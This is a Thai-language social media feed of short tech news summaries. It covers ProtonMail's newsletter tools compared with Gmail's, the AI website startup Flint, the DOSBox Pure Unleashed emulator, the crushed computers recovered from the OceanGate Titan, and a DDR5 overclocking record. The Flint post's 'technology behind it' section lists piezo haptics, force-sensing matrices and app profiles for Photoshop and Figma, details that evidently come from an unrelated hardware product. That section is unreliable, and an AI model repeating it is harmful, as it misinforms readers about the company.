    ใน Gmail ผู้ใช้สามารถเข้าไปที่ “Manage subscriptions” เพื่อดูรายชื่อผู้ส่งและกด unsubscribe ได้ แต่ข้อมูลที่แสดงค่อนข้างจำกัด เช่น จำนวนอีเมลที่ได้รับโดยประมาณ และไม่มีตัวเลือกเพิ่มเติมสำหรับจัดการอีเมลเก่า

    ProtonMail นำเสนอฟีเจอร์เดียวกันในตำแหน่งที่เข้าถึงง่ายกว่า และแสดงข้อมูลละเอียดกว่า เช่น จำนวนอีเมลที่ได้รับในเดือนล่าสุด และจำนวนที่ยังไม่ได้อ่าน พร้อมตัวเลือกจัดการอีเมลเก่า เช่น ย้ายไปถังขยะ, เก็บถาวร หรือทำให้เป็น “อ่านแล้ว” ทั้งหมด

    ที่สำคัญคือ ProtonMail ให้ผู้ใช้เลือกได้ว่าจะ “บล็อก” ผู้ส่งหรือแค่ “เลิกติดตาม” ซึ่งต่างกันมาก — การบล็อกจะปิดกั้นการสื่อสารทั้งหมดจากอีเมลนั้น ในขณะที่การเลิกติดตามจะหยุดเฉพาะอีเมลข่าวสารเท่านั้น

    ProtonMail ยังมีระบบ “จัดการแบบอัตโนมัติ” เช่น การย้ายอีเมลไปยังโฟลเดอร์เฉพาะ และการจัดเรียงตามความถี่หรือการอ่าน เพื่อช่วยให้ผู้ใช้ตัดสินใจได้ง่ายขึ้นว่าจะเก็บหรือเลิกติดตามอีเมลใด

    ProtonMail มีฟีเจอร์จัดการ newsletter ที่เข้าถึงง่ายกว่า Gmail
    อยู่ในเมนู “Views” โดยไม่ต้องคลิก “More” เหมือน Gmail

    แสดงข้อมูลละเอียด เช่น จำนวนอีเมลที่ได้รับและยังไม่ได้อ่าน
    ช่วยให้ผู้ใช้ตัดสินใจได้ง่ายขึ้นว่าจะเลิกติดตามหรือไม่

    มีตัวเลือกจัดการอีเมลเก่าเมื่อกด unsubscribe
    เช่น ย้ายไปถังขยะ, เก็บถาวร หรือทำให้เป็น “อ่านแล้ว”

    แยกการ “เลิกติดตาม” กับ “บล็อก” ผู้ส่งอย่างชัดเจน
    บล็อกจะปิดกั้นการสื่อสารทั้งหมดจากอีเมลนั้น

    สามารถย้ายอีเมลไปยังโฟลเดอร์เฉพาะและใช้กับอีเมลในอนาคต
    คลิก “Apply to future messages” เพื่อจัดการอัตโนมัติ

    มีระบบจัดเรียง newsletter ตามความถี่และการอ่าน
    เช่น มากที่สุด/น้อยที่สุด, อ่านล่าสุด, ได้รับล่าสุด

    ฟีเจอร์นี้มีในเวอร์ชันฟรีของ ProtonMail ด้วย
    ไม่จำเป็นต้องจ่ายเพื่อใช้งานพื้นฐาน

    https://news.itsfoss.com/protonmail-gmail-better-newsletter/
    📩 “ProtonMail จัดการอีเมลข่าวสารได้ดีกว่า Gmail — สะดวกกว่า ลึกกว่า และเป็นส่วนตัวมากกว่า” — เมื่อการจัดการ newsletter ไม่ใช่แค่การกด unsubscribe แต่คือการควบคุมข้อมูลของคุณ บทความจาก It’s FOSS โดย Abhishek เล่าประสบการณ์ตรงจากการใช้ ProtonMail มานานกว่า 5 ปี โดยเปรียบเทียบฟีเจอร์จัดการอีเมลข่าวสาร (newsletter) ระหว่าง ProtonMail กับ Gmail ซึ่งแม้ทั้งสองจะมีฟีเจอร์คล้ายกัน แต่ ProtonMail กลับทำได้ดีกว่าในหลายด้าน ใน Gmail ผู้ใช้สามารถเข้าไปที่ “Manage subscriptions” เพื่อดูรายชื่อผู้ส่งและกด unsubscribe ได้ แต่ข้อมูลที่แสดงค่อนข้างจำกัด เช่น จำนวนอีเมลที่ได้รับโดยประมาณ และไม่มีตัวเลือกเพิ่มเติมสำหรับจัดการอีเมลเก่า ProtonMail นำเสนอฟีเจอร์เดียวกันในตำแหน่งที่เข้าถึงง่ายกว่า และแสดงข้อมูลละเอียดกว่า เช่น จำนวนอีเมลที่ได้รับในเดือนล่าสุด และจำนวนที่ยังไม่ได้อ่าน พร้อมตัวเลือกจัดการอีเมลเก่า เช่น ย้ายไปถังขยะ, เก็บถาวร หรือทำให้เป็น “อ่านแล้ว” ทั้งหมด ที่สำคัญคือ ProtonMail ให้ผู้ใช้เลือกได้ว่าจะ “บล็อก” ผู้ส่งหรือแค่ “เลิกติดตาม” ซึ่งต่างกันมาก — การบล็อกจะปิดกั้นการสื่อสารทั้งหมดจากอีเมลนั้น ในขณะที่การเลิกติดตามจะหยุดเฉพาะอีเมลข่าวสารเท่านั้น ProtonMail ยังมีระบบ “จัดการแบบอัตโนมัติ” เช่น การย้ายอีเมลไปยังโฟลเดอร์เฉพาะ และการจัดเรียงตามความถี่หรือการอ่าน เพื่อช่วยให้ผู้ใช้ตัดสินใจได้ง่ายขึ้นว่าจะเก็บหรือเลิกติดตามอีเมลใด ✅ ProtonMail มีฟีเจอร์จัดการ newsletter ที่เข้าถึงง่ายกว่า Gmail ➡️ อยู่ในเมนู “Views” โดยไม่ต้องคลิก “More” เหมือน Gmail ✅ แสดงข้อมูลละเอียด เช่น จำนวนอีเมลที่ได้รับและยังไม่ได้อ่าน ➡️ ช่วยให้ผู้ใช้ตัดสินใจได้ง่ายขึ้นว่าจะเลิกติดตามหรือไม่ ✅ มีตัวเลือกจัดการอีเมลเก่าเมื่อกด unsubscribe ➡️ เช่น ย้ายไปถังขยะ, เก็บถาวร หรือทำให้เป็น “อ่านแล้ว” ✅ แยกการ “เลิกติดตาม” กับ “บล็อก” ผู้ส่งอย่างชัดเจน ➡️ บล็อกจะปิดกั้นการสื่อสารทั้งหมดจากอีเมลนั้น ✅ สามารถย้ายอีเมลไปยังโฟลเดอร์เฉพาะและใช้กับอีเมลในอนาคต ➡️ คลิก “Apply to future messages” เพื่อจัดการอัตโนมัติ ✅ มีระบบจัดเรียง newsletter ตามความถี่และการอ่าน ➡️ เช่น มากที่สุด/น้อยที่สุด, อ่านล่าสุด, ได้รับล่าสุด ✅ ฟีเจอร์นี้มีในเวอร์ชันฟรีของ ProtonMail ด้วย ➡️ ไม่จำเป็นต้องจ่ายเพื่อใช้งานพื้นฐาน https://news.itsfoss.com/protonmail-gmail-better-newsletter/
    NEWS.ITSFOSS.COM
    That One (of the several) Feature ProtonMail Does Better Than Gmail
    The newsletters can be a mess to manage. ProtonMail gives you better features than Gmail to manage your newsletter subscriptions.
    0 Comments 0 Shares 59 Views 0 Reviews
  • “Flint เปิดตัวเว็บไซต์อัตโนมัติ—สร้างเนื้อหาและปรับแต่งตัวเองโดยไม่ต้องมีมนุษย์”

    ลองจินตนาการว่าเว็บไซต์ของคุณสามารถสร้างหน้าใหม่ ปรับแต่งดีไซน์ และเพิ่มประสิทธิภาพ SEO ได้เองโดยไม่ต้องมีทีมงาน—นี่คือแนวคิดของ Flint สตาร์ทอัพที่เพิ่งเปิดตัวแพลตฟอร์มสร้างเว็บไซต์อัตโนมัติเต็มรูปแบบ โดยใช้ AI เป็นแกนกลางในการจัดการทุกอย่าง ตั้งแต่การออกแบบไปจนถึงการเผยแพร่

    ผู้ใช้เพียงแค่อัปโหลด content brief และลิงก์เว็บไซต์เดิม Flint จะวิเคราะห์ดีไซน์ของแบรนด์ แล้วสร้างหน้าเว็บใหม่ที่พร้อมใช้งานทันทีบนโดเมนจริง โดยไม่ต้องเขียนโค้ดหรือจัดการ CMS ใด ๆ

    Flint ได้รับเงินลงทุน $5 ล้านจาก Accel, Sheryl Sandberg’s venture fund และ Neo เพื่อขยายการพัฒนา AI และระบบออกแบบอัตโนมัติ พร้อมเปิดให้ลงทะเบียนเข้าร่วมเบต้าแล้ว

    แนวคิดของ Flint
    สร้างเว็บไซต์ที่สามารถอัปเดตและปรับแต่งตัวเองโดยอัตโนมัติ
    ใช้ AI วิเคราะห์ดีไซน์และเนื้อหาเพื่อสร้างหน้าเว็บใหม่
    ไม่ต้องเขียนโค้ดหรือใช้ CMS

    วิธีการทำงาน
    ผู้ใช้ส่ง content brief และลิงก์เว็บไซต์เดิม
    Flint สร้างหน้าเปรียบเทียบ, landing page และ SEO content
    เผยแพร่หน้าเว็บโดยตรงบนโดเมนของผู้ใช้

    เทคโนโลยีเบื้องหลัง
    ใช้ระบบ piezo haptic และ force sensing matrix สำหรับ UX
    รองรับ deep-click zones และ gesture เฉพาะแอป
    มีโปรไฟล์สำเร็จรูปสำหรับแอปยอดนิยม เช่น Photoshop, Office, Figma

    การลงทุนและการเปิดตัว
    ได้รับเงินลงทุน $5 ล้านจาก Accel และ Sheryl Sandberg
    เปิดให้ลงทะเบียนเข้าร่วมเบต้าแล้ว
    มีแผนขยายไปยังระบบ AI-driven design engineering

    คำเตือนและข้อจำกัด
    ข้อมูล SEO และ conversion ยังมาจากการรายงานภายในของบริษัท
    ยังไม่มีการเปิดเผยว่า Google จะจัดอันดับเว็บไซต์ที่ปรับตัวเองอย่างไร
    ความโปร่งใสและการควบคุมอาจเป็นประเด็นในระบบอัตโนมัติเต็มรูปแบบ

    https://www.techradar.com/pro/new-startup-wants-to-build-self-updating-autonomous-websites-that-generate-content-and-optimize-themselves-without-human-intervention-i-wonder-what-google-will-make-of-this
    🌐 “Flint เปิดตัวเว็บไซต์อัตโนมัติ—สร้างเนื้อหาและปรับแต่งตัวเองโดยไม่ต้องมีมนุษย์” ลองจินตนาการว่าเว็บไซต์ของคุณสามารถสร้างหน้าใหม่ ปรับแต่งดีไซน์ และเพิ่มประสิทธิภาพ SEO ได้เองโดยไม่ต้องมีทีมงาน—นี่คือแนวคิดของ Flint สตาร์ทอัพที่เพิ่งเปิดตัวแพลตฟอร์มสร้างเว็บไซต์อัตโนมัติเต็มรูปแบบ โดยใช้ AI เป็นแกนกลางในการจัดการทุกอย่าง ตั้งแต่การออกแบบไปจนถึงการเผยแพร่ ผู้ใช้เพียงแค่อัปโหลด content brief และลิงก์เว็บไซต์เดิม Flint จะวิเคราะห์ดีไซน์ของแบรนด์ แล้วสร้างหน้าเว็บใหม่ที่พร้อมใช้งานทันทีบนโดเมนจริง โดยไม่ต้องเขียนโค้ดหรือจัดการ CMS ใด ๆ Flint ได้รับเงินลงทุน $5 ล้านจาก Accel, Sheryl Sandberg’s venture fund และ Neo เพื่อขยายการพัฒนา AI และระบบออกแบบอัตโนมัติ พร้อมเปิดให้ลงทะเบียนเข้าร่วมเบต้าแล้ว ✅ แนวคิดของ Flint ➡️ สร้างเว็บไซต์ที่สามารถอัปเดตและปรับแต่งตัวเองโดยอัตโนมัติ ➡️ ใช้ AI วิเคราะห์ดีไซน์และเนื้อหาเพื่อสร้างหน้าเว็บใหม่ ➡️ ไม่ต้องเขียนโค้ดหรือใช้ CMS ✅ วิธีการทำงาน ➡️ ผู้ใช้ส่ง content brief และลิงก์เว็บไซต์เดิม ➡️ Flint สร้างหน้าเปรียบเทียบ, landing page และ SEO content ➡️ เผยแพร่หน้าเว็บโดยตรงบนโดเมนของผู้ใช้ ✅ เทคโนโลยีเบื้องหลัง ➡️ ใช้ระบบ piezo haptic และ force sensing matrix สำหรับ UX ➡️ รองรับ deep-click zones และ gesture เฉพาะแอป ➡️ มีโปรไฟล์สำเร็จรูปสำหรับแอปยอดนิยม เช่น Photoshop, Office, Figma ✅ การลงทุนและการเปิดตัว ➡️ ได้รับเงินลงทุน $5 ล้านจาก Accel และ Sheryl Sandberg ➡️ เปิดให้ลงทะเบียนเข้าร่วมเบต้าแล้ว ➡️ มีแผนขยายไปยังระบบ AI-driven design engineering ‼️ คำเตือนและข้อจำกัด ⛔ ข้อมูล SEO และ conversion ยังมาจากการรายงานภายในของบริษัท ⛔ ยังไม่มีการเปิดเผยว่า Google จะจัดอันดับเว็บไซต์ที่ปรับตัวเองอย่างไร ⛔ ความโปร่งใสและการควบคุมอาจเป็นประเด็นในระบบอัตโนมัติเต็มรูปแบบ https://www.techradar.com/pro/new-startup-wants-to-build-self-updating-autonomous-websites-that-generate-content-and-optimize-themselves-without-human-intervention-i-wonder-what-google-will-make-of-this
    WWW.TECHRADAR.COM
    Websites that build and fix themselves may soon flood Google
    AI-driven system promises to turn websites into self-updating digital agents
    0 Comments 0 Shares 155 Views 0 Reviews
  • "DOSBox Pure Unleashed: อีมูเลเตอร์ยุคใหม่ที่ปลดล็อกความคลาสสิกของเกม DOS"

    หลังจากใช้เวลาพัฒนานานถึง 5 ปี Psyraven ได้เปิดตัว DOSBox Pure Unleashed อย่างเป็นทางการ—เวอร์ชันใหม่ของอีมูเลเตอร์ DOS ที่ไม่ต้องพึ่ง RetroArch อีกต่อไป และพร้อมใช้งานแบบ standalone บน Windows, macOS และ Linux

    เวอร์ชันใหม่นี้มาพร้อม UI ที่ใช้งานง่าย และฟีเจอร์ล้ำ ๆ ที่ตอบโจทย์นักเล่นเกม retro โดยเฉพาะ เช่น การรันเกมจากไฟล์ ZIP โดยไม่ต้องติดตั้ง OS, รองรับกราฟิก Voodoo สูงสุดถึง 4K, การใช้ MIDI synth และ SoundFonts, รวมถึงระบบ save state และการตั้งค่าคอนโทรลเลอร์แบบอัตโนมัติ

    ที่สำคัญคือการรองรับเกม Windows 9X แบบทดลอง ซึ่งเป็นก้าวสำคัญในการขยายขอบเขตของอีมูเลเตอร์ DOS ไปสู่ยุค Windows รุ่นเก่า

    จุดเด่นของ DOSBox Pure Unleashed
    เป็นเวอร์ชัน standalone ไม่ต้องใช้ RetroArch
    รองรับ Windows, macOS และ Linux
    UI ใช้งานง่าย แบ่งหมวดหมู่ชัดเจน
    รันเกมจาก ZIP ได้ทันที ไม่ต้องติดตั้ง OS

    ฟีเจอร์ใหม่ที่น่าสนใจ
    รองรับ Voodoo graphics สูงสุด 4K/UHD
    ใช้ MIDI synth และ SoundFonts ได้
    มีระบบ save state และ shared system shells
    รองรับการตั้งค่าคอนโทรลเลอร์อัตโนมัติ
    มี on-screen keyboard และ mouse/joystick emulation

    ความสามารถเพิ่มเติม
    รองรับ Windows 9X แบบทดลอง
    มีฟีเจอร์ auto-start และ advanced OS install options
    มี CRT filters สำหรับภาพแบบยุคเก่า
    รองรับ MT-32 และ SoundFont playback

    คำเตือนในการใช้งาน
    ฟีเจอร์ Windows 9X ยังอยู่ในขั้นทดลอง อาจไม่เสถียร
    การตั้งค่าขั้นสูงอาจต้องใช้ความรู้ด้านเทคนิค
    ไม่เหมาะสำหรับผู้ใช้ทั่วไปที่ต้องการ “คลิกแล้วเล่น” แบบง่าย ๆ

    การสนับสนุนและชุมชน
    มี Discord สำหรับพูดคุยและแลกเปลี่ยนเทคนิค
    ดาวน์โหลดฟรี ขนาดไฟล์เล็ก ~1.5MB
    ผู้พัฒนาหวังรับ “ทิป” ผ่านหน้า Itch.io

    สาระเพิ่มเติมจากภายนอก:
    ความสำคัญของ DOSBox ในวงการเกม retro
    เป็นเครื่องมือหลักในการเล่นเกม DOS บนระบบปฏิบัติการยุคใหม่
    ช่วยอนุรักษ์เกมเก่าและประสบการณ์การเล่นแบบดั้งเดิม

    แนวโน้มของอีมูเลเตอร์ยุคใหม่
    เน้นความง่ายในการใช้งานและความแม่นยำในการจำลอง
    รองรับกราฟิกและเสียงระดับสูงเพื่อประสบการณ์ที่สมจริง

    https://www.tomshardware.com/video-games/retro-gaming/dosbox-pure-unleashed-is-ready-for-windows-mac-and-linux-computers-after-five-years-in-development-enhanced-standalone-release-no-longer-restricted-to-being-a-retroarch-core
    🎮 "DOSBox Pure Unleashed: อีมูเลเตอร์ยุคใหม่ที่ปลดล็อกความคลาสสิกของเกม DOS" หลังจากใช้เวลาพัฒนานานถึง 5 ปี Psyraven ได้เปิดตัว DOSBox Pure Unleashed อย่างเป็นทางการ—เวอร์ชันใหม่ของอีมูเลเตอร์ DOS ที่ไม่ต้องพึ่ง RetroArch อีกต่อไป และพร้อมใช้งานแบบ standalone บน Windows, macOS และ Linux เวอร์ชันใหม่นี้มาพร้อม UI ที่ใช้งานง่าย และฟีเจอร์ล้ำ ๆ ที่ตอบโจทย์นักเล่นเกม retro โดยเฉพาะ เช่น การรันเกมจากไฟล์ ZIP โดยไม่ต้องติดตั้ง OS, รองรับกราฟิก Voodoo สูงสุดถึง 4K, การใช้ MIDI synth และ SoundFonts, รวมถึงระบบ save state และการตั้งค่าคอนโทรลเลอร์แบบอัตโนมัติ ที่สำคัญคือการรองรับเกม Windows 9X แบบทดลอง ซึ่งเป็นก้าวสำคัญในการขยายขอบเขตของอีมูเลเตอร์ DOS ไปสู่ยุค Windows รุ่นเก่า ✅ จุดเด่นของ DOSBox Pure Unleashed ➡️ เป็นเวอร์ชัน standalone ไม่ต้องใช้ RetroArch ➡️ รองรับ Windows, macOS และ Linux ➡️ UI ใช้งานง่าย แบ่งหมวดหมู่ชัดเจน ➡️ รันเกมจาก ZIP ได้ทันที ไม่ต้องติดตั้ง OS ✅ ฟีเจอร์ใหม่ที่น่าสนใจ ➡️ รองรับ Voodoo graphics สูงสุด 4K/UHD ➡️ ใช้ MIDI synth และ SoundFonts ได้ ➡️ มีระบบ save state และ shared system shells ➡️ รองรับการตั้งค่าคอนโทรลเลอร์อัตโนมัติ ➡️ มี on-screen keyboard และ mouse/joystick emulation ✅ ความสามารถเพิ่มเติม ➡️ รองรับ Windows 9X แบบทดลอง ➡️ มีฟีเจอร์ auto-start และ advanced OS install options ➡️ มี CRT filters สำหรับภาพแบบยุคเก่า ➡️ รองรับ MT-32 และ SoundFont playback ‼️ คำเตือนในการใช้งาน ⛔ ฟีเจอร์ Windows 9X ยังอยู่ในขั้นทดลอง อาจไม่เสถียร ⛔ การตั้งค่าขั้นสูงอาจต้องใช้ความรู้ด้านเทคนิค ⛔ ไม่เหมาะสำหรับผู้ใช้ทั่วไปที่ต้องการ “คลิกแล้วเล่น” แบบง่าย ๆ ✅ การสนับสนุนและชุมชน ➡️ มี Discord สำหรับพูดคุยและแลกเปลี่ยนเทคนิค ➡️ ดาวน์โหลดฟรี ขนาดไฟล์เล็ก ~1.5MB ➡️ ผู้พัฒนาหวังรับ “ทิป” ผ่านหน้า Itch.io 📎 สาระเพิ่มเติมจากภายนอก: ✅ ความสำคัญของ DOSBox ในวงการเกม retro ➡️ เป็นเครื่องมือหลักในการเล่นเกม DOS บนระบบปฏิบัติการยุคใหม่ ➡️ ช่วยอนุรักษ์เกมเก่าและประสบการณ์การเล่นแบบดั้งเดิม ✅ แนวโน้มของอีมูเลเตอร์ยุคใหม่ ➡️ เน้นความง่ายในการใช้งานและความแม่นยำในการจำลอง ➡️ รองรับกราฟิกและเสียงระดับสูงเพื่อประสบการณ์ที่สมจริง https://www.tomshardware.com/video-games/retro-gaming/dosbox-pure-unleashed-is-ready-for-windows-mac-and-linux-computers-after-five-years-in-development-enhanced-standalone-release-no-longer-restricted-to-being-a-retroarch-core
    0 Comments 0 Shares 117 Views 0 Reviews
  • "ซากโลหะที่เคยเป็นสมองของ Titan: เบื้องหลังการพังทลายของระบบคอมพิวเตอร์ใต้น้ำลึก"

    หลังจากเหตุการณ์การระเบิดของเรือดำน้ำ Titan ของ OceanGate ในปี 2023 ซึ่งคร่าชีวิตผู้โดยสารทั้งหมด การสืบสวนโดย NTSB (คณะกรรมการความปลอดภัยการขนส่งแห่งชาติของสหรัฐฯ) ได้เผยภาพและข้อมูลล่าสุดเกี่ยวกับสภาพของระบบคอมพิวเตอร์ภายในเรือ—ซึ่งถูกบดขยี้จนกลายเป็นกองโลหะบิดเบี้ยวที่แทบไม่เหลือเค้าโครงเดิม

    ระบบคอมพิวเตอร์ของ Titan ประกอบด้วยพีซีแบบ fanless รุ่น Nuvo-5000LP จำนวน 3 เครื่อง ซึ่งทำหน้าที่เป็นสมองของเรือในการบันทึกข้อมูลการทำงานและตรวจสอบโครงสร้างเรือแบบอะคูสติก แต่หลังจากการระเบิด พีซีเหล่านี้กลายเป็นก้อนโลหะหนักกว่า 45 กิโลกรัมที่รวมเอาแผงวงจร โลหะ และพลาสติกอัดแน่นเข้าด้วยกัน

    แม้จะมีความหวังว่าจะสามารถกู้ข้อมูลจาก SSD ได้ แต่การสแกน CT ไม่สามารถเจาะเข้าไปถึงชิปหน่วยความจำได้ และการใช้พลังงานสูงกว่านี้อาจทำลายข้อมูลที่เหลืออยู่ ทีมงานจึงส่งต่อซากไปยังห้องแล็บของ ATF ซึ่งสามารถแยกแผง SSD ออกมาได้ 2 แผง แต่พบว่าชิปหน่วยความจำเสียหายอย่างหนัก—บางชิปหายไป บางชิปแตกร้าว และไม่มีข้อมูลใดสามารถกู้คืนได้

    สภาพของระบบคอมพิวเตอร์หลังเหตุการณ์
    พีซี Nuvo-5000LP จำนวน 3 เครื่องถูกบดขยี้รวมกันเป็นก้อนโลหะหนัก ~45 กิโลกรัม
    ทำหน้าที่บันทึกข้อมูลการทำงานและตรวจสอบโครงสร้างเรือแบบอะคูสติก
    กล้องและอุปกรณ์อื่น ๆ เสียหายเกือบทั้งหมด ยกเว้นการ์ด SD ที่รอดมาได้ในเหตุการณ์อื่น

    การสแกนและกู้ข้อมูล
    ใช้ CT scan เพื่อตรวจหาชิปหน่วยความจำที่อาจรอด
    ไม่พบช่องว่างที่ชิปอาจอยู่รอดได้
    หลีกเลี่ยงการใช้พลังงานสูงในการสแกนเพื่อไม่ให้ข้อมูลเสียหาย

    การวิเคราะห์โดย ATF
    แยกแผง SSD ได้ 2 แผงจากซากโลหะ
    พบว่าชิปหน่วยความจำบางส่วนหายไป และบางส่วนแตกร้าว
    ไม่สามารถกู้ข้อมูลใด ๆ ได้จากแผงที่เหลือ

    คำเตือนจากการออกแบบระบบ
    การใช้พีซีแบบ fanless อาจไม่ทนต่อแรงดันและความร้อนจากการระเบิด
    ไม่มีระบบป้องกันข้อมูลในกรณีฉุกเฉินหรือการระเบิด
    การออกแบบระบบเก็บข้อมูลควรคำนึงถึงการกู้คืนหลังภัยพิบัติ

    สาระเพิ่มเติมจากภายนอก:
    ความท้าทายในการกู้ข้อมูลจากอุปกรณ์ที่เสียหาย
    SSD มีโครงสร้างที่ซับซ้อนและเปราะบางต่อแรงกระแทก
    การกู้ข้อมูลต้องใช้เทคนิคระดับสูง เช่น การสกัดชิปและอ่านข้อมูลโดยตรงจาก NAND

    บทเรียนจาก Titan สำหรับการออกแบบระบบใต้น้ำ
    ควรมีระบบบันทึกข้อมูลซ้ำในหลายตำแหน่ง
    ใช้วัสดุที่ทนแรงดันและความร้อนสูง
    ออกแบบให้สามารถกู้คืนข้อมูลได้แม้ในกรณีที่โครงสร้างหลักเสียหาย

    https://www.tomshardware.com/tech-industry/oceangate-titan-computers-crushed-into-twisted-mass-of-metal-and-electronics-during-catastrophic-implosion-investigators-find-signs-of-thermal-damage-too
    🥶 "ซากโลหะที่เคยเป็นสมองของ Titan: เบื้องหลังการพังทลายของระบบคอมพิวเตอร์ใต้น้ำลึก" หลังจากเหตุการณ์การระเบิดของเรือดำน้ำ Titan ของ OceanGate ในปี 2023 ซึ่งคร่าชีวิตผู้โดยสารทั้งหมด การสืบสวนโดย NTSB (คณะกรรมการความปลอดภัยการขนส่งแห่งชาติของสหรัฐฯ) ได้เผยภาพและข้อมูลล่าสุดเกี่ยวกับสภาพของระบบคอมพิวเตอร์ภายในเรือ—ซึ่งถูกบดขยี้จนกลายเป็นกองโลหะบิดเบี้ยวที่แทบไม่เหลือเค้าโครงเดิม ระบบคอมพิวเตอร์ของ Titan ประกอบด้วยพีซีแบบ fanless รุ่น Nuvo-5000LP จำนวน 3 เครื่อง ซึ่งทำหน้าที่เป็นสมองของเรือในการบันทึกข้อมูลการทำงานและตรวจสอบโครงสร้างเรือแบบอะคูสติก แต่หลังจากการระเบิด พีซีเหล่านี้กลายเป็นก้อนโลหะหนักกว่า 45 กิโลกรัมที่รวมเอาแผงวงจร โลหะ และพลาสติกอัดแน่นเข้าด้วยกัน แม้จะมีความหวังว่าจะสามารถกู้ข้อมูลจาก SSD ได้ แต่การสแกน CT ไม่สามารถเจาะเข้าไปถึงชิปหน่วยความจำได้ และการใช้พลังงานสูงกว่านี้อาจทำลายข้อมูลที่เหลืออยู่ ทีมงานจึงส่งต่อซากไปยังห้องแล็บของ ATF ซึ่งสามารถแยกแผง SSD ออกมาได้ 2 แผง แต่พบว่าชิปหน่วยความจำเสียหายอย่างหนัก—บางชิปหายไป บางชิปแตกร้าว และไม่มีข้อมูลใดสามารถกู้คืนได้ ✅ สภาพของระบบคอมพิวเตอร์หลังเหตุการณ์ ➡️ พีซี Nuvo-5000LP จำนวน 3 เครื่องถูกบดขยี้รวมกันเป็นก้อนโลหะหนัก ~45 กิโลกรัม ➡️ ทำหน้าที่บันทึกข้อมูลการทำงานและตรวจสอบโครงสร้างเรือแบบอะคูสติก ➡️ กล้องและอุปกรณ์อื่น ๆ เสียหายเกือบทั้งหมด ยกเว้นการ์ด SD ที่รอดมาได้ในเหตุการณ์อื่น ✅ การสแกนและกู้ข้อมูล ➡️ ใช้ CT scan เพื่อตรวจหาชิปหน่วยความจำที่อาจรอด ➡️ ไม่พบช่องว่างที่ชิปอาจอยู่รอดได้ ➡️ หลีกเลี่ยงการใช้พลังงานสูงในการสแกนเพื่อไม่ให้ข้อมูลเสียหาย ✅ การวิเคราะห์โดย ATF ➡️ แยกแผง SSD ได้ 2 แผงจากซากโลหะ ➡️ พบว่าชิปหน่วยความจำบางส่วนหายไป และบางส่วนแตกร้าว ➡️ ไม่สามารถกู้ข้อมูลใด ๆ ได้จากแผงที่เหลือ ‼️ คำเตือนจากการออกแบบระบบ ⛔ การใช้พีซีแบบ fanless อาจไม่ทนต่อแรงดันและความร้อนจากการระเบิด ⛔ ไม่มีระบบป้องกันข้อมูลในกรณีฉุกเฉินหรือการระเบิด ⛔ การออกแบบระบบเก็บข้อมูลควรคำนึงถึงการกู้คืนหลังภัยพิบัติ 📎 สาระเพิ่มเติมจากภายนอก: ✅ ความท้าทายในการกู้ข้อมูลจากอุปกรณ์ที่เสียหาย ➡️ SSD มีโครงสร้างที่ซับซ้อนและเปราะบางต่อแรงกระแทก ➡️ การกู้ข้อมูลต้องใช้เทคนิคระดับสูง เช่น การสกัดชิปและอ่านข้อมูลโดยตรงจาก NAND ✅ บทเรียนจาก Titan สำหรับการออกแบบระบบใต้น้ำ ➡️ ควรมีระบบบันทึกข้อมูลซ้ำในหลายตำแหน่ง ➡️ ใช้วัสดุที่ทนแรงดันและความร้อนสูง ➡️ ออกแบบให้สามารถกู้คืนข้อมูลได้แม้ในกรณีที่โครงสร้างหลักเสียหาย https://www.tomshardware.com/tech-industry/oceangate-titan-computers-crushed-into-twisted-mass-of-metal-and-electronics-during-catastrophic-implosion-investigators-find-signs-of-thermal-damage-too
    0 Comments 0 Shares 145 Views 0 Reviews
  • “DDR5 ทะลุ 13,000 MT/s ครั้งแรก!” — Corsair Vengeance และ GIGABYTE Z890 สร้างสถิติใหม่ในโลกการโอเวอร์คล็อก

    ในโลกของการโอเวอร์คล็อก หนึ่งในเป้าหมายที่นักเล่นระดับสูงไล่ล่ามานานคือการทำให้ DDR5 ทะลุความเร็ว 13,000 MT/s และล่าสุดก็มีคนทำสำเร็จแล้ว! นักโอเวอร์คล็อกชาวเยอรมันชื่อ “sergmann” ได้สร้างสถิติใหม่ด้วย Corsair Vengeance DDR5 บนเมนบอร์ด GIGABYTE Z890 Aorus Tachyon ICE โดยจับคู่กับซีพียู Intel Core Ultra 9 285K และใช้ไนโตรเจนเหลวในการระบายความร้อน

    ก่อนหน้านี้ “saltycroissant” เคยทำสถิติไว้ที่ 12,920 MT/s และเกือบจะทะลุ 13,000 MT/s แต่ sergmann แซงหน้าไปด้วยความเร็ว 13,010 MT/s ซึ่งได้รับการยืนยันจาก HWBot และ CPU-Z

    แม้ความเร็วจะสูงมาก แต่ latency ก็สูงเช่นกัน (CL68-127-127-127-2) ทำให้ไม่เหมาะกับการใช้งานทั่วไป แต่ถือเป็นชัยชนะเชิงเทคนิคที่แสดงถึงศักยภาพของฮาร์ดแวร์ยุคใหม่ โดยเฉพาะเมนบอร์ด Z890 และหน่วยความจำ DDR5 รุ่นล่าสุด

    ข้อมูลในข่าว
    DDR5 ถูกโอเวอร์คล็อกทะลุ 13,000 MT/s เป็นครั้งแรก
    นักโอเวอร์คล็อก “sergmann” ใช้ Corsair Vengeance DDR5 และ GIGABYTE Z890 Aorus Tachyon ICE
    ซีพียูที่ใช้คือ Intel Core Ultra 9 285K
    ใช้ไนโตรเจนเหลวในการระบายความร้อน
    ความเร็วที่ทำได้คือ 13,010 MT/s (6504 MHz)
    ได้รับการยืนยันจาก HWBot และ CPU-Z
    ค่า latency อยู่ที่ CL68-127-127-127-2
    IMC to Memory Clock ratio อยู่ที่ 3:190
    ความเร็วระดับนี้ไม่เหมาะกับการใช้งานทั่วไป แต่เป็นการโชว์ศักยภาพ
    เมนบอร์ด Z890 และซีพียู Ultra 200S มี memory controller ที่รองรับความเร็วสูง
    Corsair, Gigabyte, Seasonic และ ThermalGrizzly มีส่วนสนับสนุนการทดสอบ

    https://wccftech.com/ddr5-memory-officially-pushed-over-13000-mt-s-for-the-first-time/
